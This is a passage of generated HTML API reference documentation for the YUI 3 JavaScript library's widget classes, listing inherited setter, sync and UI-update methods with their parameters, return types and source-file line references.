<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__setButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l847"><code>widget-buttons/js/widget-buttons.js:847</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Setter for the <code>buttons</code> attribute. This processes the specified <code>config</code>
and returns a new <code>buttons</code> object which is stored as the new state; leaving
the original, specified <code>config</code> unmodified.</p>
<p>The button nodes will either be created via <code>Y.Plugin.Button.createNode()</code>,
or when a button is already a Node already, it will by <code>plug()</code>ed with
<code>Y.Plugin.Button</code>.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The <code>buttons</code> configuration to process.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The processed <code>buttons</code> object which represents the new
state.
</div>
</div>
</div>
<div id="method__setCB" class="method item private inherited">
<h3 class="name"><code>_setCB</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>node</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__setCB">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l766"><code>widget/js/Widget.js:766</code></a>
</p>
</div>
<div class="description">
<p>Setter for the contentBox attribute</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">node</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
Node
</div>
</div>
</div>
<div id="method__setConstrain" class="method item protected inherited">
<h3 class="name"><code>_setConstrain</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method__setConstrain">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l153"><code>widget-position-constrain/js/Widget-PositionConstrain.js:153</code></a>
</p>
</div>
<div class="description">
<p>The setter implementation for the "constrain" attribute.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | boolean</span>
<div class="param-description">
<p>The attribute value</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__setStateVal" class="method item private inherited">
<h3 class="name"><code>_setStateVal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
<li class="arg">
<code>value</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__setStateVal">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l536"><code>attribute/js/AttributeCore.js:536</code></a>
</p>
</div>
<div class="description">
<p>Sets the stored value for the attribute, in either the
internal state object, or the state proxy if it exits</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute</p>
</div>
</li>
<li class="param">
<code class="param-name">value</code>
<span class="type">Any</span>
<div class="param-description">
<p>The value of the attribute</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__setStrings" class="method item protected inherited">
<h3 class="name"><code>_setStrings</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>strings</code>
</li>
<li class="arg">
<code>locale</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__setStrings">Widget</a>:
<a href="../files/widget_js_WidgetLocale.js.html#l32"><code>widget/js/WidgetLocale.js:32</code></a>
</p>
</div>
<div class="description">
<p>Sets strings for a particular locale, merging with any existing
strings which may already be defined for the locale.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">strings</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The hash of string key/values to set</p>
</div>
</li>
<li class="param">
<code class="param-name">locale</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The locale for the string values being set</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__setX" class="method item protected inherited">
<h3 class="name"><code>_setX</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__setX">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l196"><code>widget-position/js/Widget-Position.js:196</code></a>
</p>
</div>
<div class="description">
<p>Default setter for the X attribute. The setter passes the X value through
to the XY attribute, which is the sole store for the XY state.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The X page co-ordinate value</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__setY" class="method item protected inherited">
<h3 class="name"><code>_setY</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__setY">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l208"><code>widget-position/js/Widget-Position.js:208</code></a>
</p>
</div>
<div class="description">
<p>Default setter for the Y attribute. The setter passes the Y value through
to the XY attribute, which is the sole store for the XY state.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The Y page co-ordinate value</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__setZIndex" class="method item protected inherited">
<h3 class="name"><code>_setZIndex</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>zIndex</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__setZIndex">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l218"><code>widget-stack/js/Widget-Stack.js:218</code></a>
</p>
</div>
<div class="description">
<p>Default setter for zIndex attribute changes. Normalizes zIndex values to
numbers, converting non-numerical values to 0.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">zIndex</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>:
Normalized zIndex
</div>
</div>
</div>
<div id="method__strSetter" class="method item protected inherited">
<h3 class="name"><code>_strSetter</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>strings</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__strSetter">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1210"><code>widget/js/Widget.js:1210</code></a>
</p>
</div>
<div class="description">
<p>The default setter for the strings attribute. Merges partial sets
into the full string set, to allow users to partial sets of strings</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">strings</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
The full set of strings to set
</div>
</div>
</div>
<div id="method__syncAttrUI" class="method item private inherited">
<h3 class="name"><code>_syncAttrUI</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__syncAttrUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1184"><code>widget/js/Widget.js:1184</code></a>
</p>
</div>
<div class="description">
<p>Invokes the _uiSet=ATTR NAME> method for the list of attributes provided</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__syncUI" class="method item protected inherited">
<h3 class="name"><code>_syncUI</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__syncUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l962"><code>widget/js/Widget.js:962</code></a>
</p>
</div>
<div class="description">
<p>Updates the widget UI to reflect the attribute state.</p>
</div>
</div>
<div id="method__syncUIAutohide" class="method item protected inherited">
<h3 class="name"><code>_syncUIAutohide</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#method__syncUIAutohide">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l110"><code>widget-autohide/js/Widget-Autohide.js:110</code></a>
</p>
</div>
<div class="description">
<p>Syncs up the widget based on its current state. In particular, removes event listeners if
widget is not visible, and attaches them otherwise.</p>
<p>
This method in invoked after syncUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__syncUIButtons" class="method item protected inherited">
<h3 class="name"><code>_syncUIButtons</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__syncUIButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l903"><code>widget-buttons/js/widget-buttons.js:903</code></a>
</p>
<p>Available since 3.4.0</p>
</div>
<div class="description">
<p>Syncs this widget's current button-related state to its DOM. This method is
inserted via AOP, and will execute after <code>syncUI()</code>.</p>
</div>
</div>
<div id="method__syncUIChild" class="method item protected inherited">
<h3 class="name"><code>_syncUIChild</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__syncUIChild">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l341"><code>widget-child/js/Widget-Child.js:341</code></a>
</p>
</div>
<div class="description">
<p>Synchronizes the UI to match the WidgetChild state.</p>
<p>
This method is invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__syncUIModal" class="method item protected inherited">
<h3 class="name"><code>_syncUIModal</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__syncUIModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l251"><code>widget-modality/js/Widget-Modality.js:251</code></a>
</p>
</div>
<div class="description">
<p>Syncs the mask with the widget's current state, namely the visibility and z-index of the widget</p>
<p>
This method in invoked after syncUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__syncUIPosAlign" class="method item protected inherited">
<h3 class="name"><code>_syncUIPosAlign</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__syncUIPosAlign">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l254"><code>widget-position-align/js/Widget-PositionAlign.js:254</code></a>
</p>
</div>
<div class="description">
<p>Synchronizes the current <code>align</code> Attribute value to the DOM.</p>
<p>This method is invoked after <code>syncUI</code> has been invoked for the <code>Widget</code>
class using the AOP infrastructure.</p>
</div>
</div>
<div id="method__syncUIPosition" class="method item protected inherited">
<h3 class="name"><code>_syncUIPosition</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__syncUIPosition">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l126"><code>widget-position/js/Widget-Position.js:126</code></a>
</p>
</div>
<div class="description">
<p>Synchronizes the UI to match the Widgets xy page position state.</p>
<p>
This method in invoked after syncUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__syncUIStack" class="method item protected inherited">
<h3 class="name"><code>_syncUIStack</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__syncUIStack">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l143"><code>widget-stack/js/Widget-Stack.js:143</code></a>
</p>
</div>
<div class="description">
<p>Synchronizes the UI to match the Widgets stack state. This method in
invoked after syncUI is invoked for the Widget class using YUI's aop infrastructure.</p>
</div>
</div>
<div id="method__syncUIStdMod" class="method item protected inherited">
<h3 class="name"><code>_syncUIStdMod</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__syncUIStdMod">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l257"><code>widget-stdmod/js/Widget-StdMod.js:257</code></a>
</p>
</div>
<div class="description">
<p>Synchronizes the UI to match the Widgets standard module state.</p>
<p>
This method is invoked after syncUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__uiInsertButton" class="method item protected inherited">
<h3 class="name"><code>_uiInsertButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
<li class="arg">
<code>section</code>
</li>
<li class="arg">
<code>index</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__uiInsertButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l917"><code>widget-buttons/js/widget-buttons.js:917</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Inserts the specified <code>button</code> node into this widget's DOM at the specified
<code>section</code> and <code>index</code> and updates the section content.</p>
<p>The section and button container nodes will be created if they do not
already exist.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The button node to insert into this widget's DOM.</p>
</div>
</li>
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section (header/body/footer).</p>
</div>
</li>
<li class="param">
<code class="param-name">index</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>Index at which the <code>button</code> should be positioned.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiRemoveButton" class="method item protected inherited">
<h3 class="name"><code>_uiRemoveButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
<li class="arg">
<code>section</code>
</li>
<li class="arg">
<code class="optional">[options]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__uiRemoveButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l943"><code>widget-buttons/js/widget-buttons.js:943</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Removes the button node from this widget's DOM and detaches any event
subscriptions on the button that were created by this widget. The section
content will be updated unless <code>{preserveContent: true}</code> is passed in the
<code>options</code>.</p>
<p>By default the button container node will be removed when this removes the
last button of the specified <code>section</code>; and if no other content remains in
the section node, it will also be removed.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The button to remove and destroy.</p>
</div>
</li>
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section (header/body/footer).</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[options]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Additional options.</p>
</div>
<ul class="params-list">
<li class="param">
<code class="param-name optional">[preserveContent=false]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Whether the section
content should be updated.</p>
</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div id="method__uiSetAlign" class="method item protected inherited">
<h3 class="name"><code>_uiSetAlign</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code class="optional">[node]</code>
</li>
<li class="arg">
<code>points</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__uiSetAlign">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l347"><code>widget-position-align/js/Widget-PositionAlign.js:347</code></a>
</p>
</div>
<div class="description">
<p>Updates the UI to reflect the <code>align</code> value passed in.</p>
<p><strong>Note:</strong> See the <code>align</code> Attribute documentation, for the Object structure
expected.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name optional">[node]</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | Null</span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The node to align to, or null to indicate
the viewport.</p>
</div>
</li>
<li class="param">
<code class="param-name">points</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
<p>The alignment points.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetButtons" class="method item protected inherited">
<h3 class="name"><code>_uiSetButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>buttons</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__uiSetButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l993"><code>widget-buttons/js/widget-buttons.js:993</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Sets the current <code>buttons</code> state to this widget's DOM by rendering the
specified collection of <code>buttons</code> and updates the contents of each section
as needed.</p>
<p>Button nodes which already exist in the DOM will remain intact, or will be
moved if they should be in a new position. Old button nodes which are no
longer represented in the specified <code>buttons</code> collection will be removed,
and any event subscriptions on the button which were created by this widget
will be detached.</p>
<p>If the button nodes in this widget's DOM actually change, then each content
section will be updated (or removed) appropriately.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">buttons</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The current <code>buttons</code> state to visually represent.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetChildSelected" class="method item protected inherited">
<h3 class="name"><code>_uiSetChildSelected</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>selected</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetChildSelected">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l305"><code>widget-child/js/Widget-Child.js:305</code></a>
</p>
</div>
<div class="description">
<p>Updates the UI to reflect the <code>selected</code> attribute value.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">selected</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The selected value to be reflected in the UI.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetDefaultButton" class="method item protected inherited">
<h3 class="name"><code>_uiSetDefaultButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>newButton</code>
</li>
<li class="arg">
<code>oldButton</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__uiSetDefaultButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1077"><code>widget-buttons/js/widget-buttons.js:1077</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Adds the "yui3-button-primary" CSS class to the new <code>defaultButton</code> and
removes it from the old default button.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">newButton</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The new <code>defaultButton</code>.</p>
</div>
</li>
<li class="param">
<code class="param-name">oldButton</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The old <code>defaultButton</code>.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetDim" class="method item private inherited">
<h3 class="name"><code>_uiSetDim</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>dim</code>
</li>
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetDim">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l995"><code>widget/js/Widget.js:995</code></a>
</p>
</div>
<div class="description">
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">dim</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The dimension - "width" or "height"</p>
</div>
</li>
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The value to set</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetDisabled" class="method item protected inherited">
<h3 class="name"><code>_uiSetDisabled</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetDisabled">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1016"><code>widget/js/Widget.js:1016</code></a>
</p>
</div>
<div class="description">
<p>Sets the disabled state for the UI</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetFillHeight" class="method item protected inherited">
<h3 class="name"><code>_uiSetFillHeight</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>fillSection</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__uiSetFillHeight">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l398"><code>widget-stdmod/js/Widget-StdMod.js:398</code></a>
</p>
</div>
<div class="description">
<p>Updates the rendered UI, to resize the provided section so that the standard module fills out
the specified widget height. Note: This method does not check whether or not a height is set
on the Widget.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">fillSection</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>A valid section specifier - one of WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetFocused" class="method item protected inherited">
<h3 class="name"><code>_uiSetFocused</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
<li class="arg">
<code>src</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetFocused">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1027"><code>widget/js/Widget.js:1027</code></a>
</p>
</div>
<div class="description">
<p>Sets the focused state for the UI</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
</div>
</li>
<li class="param">
<code class="param-name">src</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>String representing the source that triggered an update to
the UI.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetHeight" class="method item protected inherited">
<h3 class="name"><code>_uiSetHeight</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetHeight">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l972"><code>widget/js/Widget.js:972</code></a>
</p>
</div>
<div class="description">
<p>Sets the height on the widget's bounding box element</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetHostVisibleAutohide" class="method item protected inherited">
<h3 class="name"><code>_uiSetHostVisibleAutohide</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#method__uiSetHostVisibleAutohide">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l127"><code>widget-autohide/js/Widget-Autohide.js:127</code></a>
</p>
</div>
<div class="description">
